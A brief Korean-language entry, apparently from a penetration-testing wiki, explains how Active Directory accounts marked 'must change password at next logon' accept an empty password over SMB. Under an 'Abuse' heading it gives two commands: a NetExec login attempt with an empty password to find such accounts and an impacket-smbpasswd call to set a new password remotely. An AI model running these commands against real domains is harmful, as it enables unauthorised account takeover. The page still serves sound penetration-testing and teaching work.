Password Must Change

Password Must Change는 도메인 계정을 생성할 때 User must change password at next logon 설정을 하거나, 기존에 있던 사용자의 패스워드를 초기화 할 경우 바로 다음 로그인 시 반드시 패스워드를 입력해서 초기화 해야 하는 설정입니다.

주로 기업에서 보안 감사로 인해 정책에 맞지 않는 패스워드를 사용하거나, 변경을 오랜기간 하지 않은 유저에 대하여 강제적으로 패스워드 초기화를 진행했을 때 정찰 단계에서 유용하게 사용할 수 있는 방법론 중 하나입니다. 설정 이후 최초 로그인을 하지 않아 패스워드 초기 설정이 필요한 계정의 경우 패스워드를 null 값으로 로그인 했을 때도 로그인이 성공하기 때문에 SMB 프로토콜을 이용해서 원격에서 초기 패스워드 설정이 가능합니다.

Abuse

# 도메인 내 Password must change 유저 목록 확인
nxc smb <Domain> -u <USER> -p ''

# 패스워드 초기 설정
impacket-smbpasswd <Domain/USER@DC FQDN> -newpass <New PASS>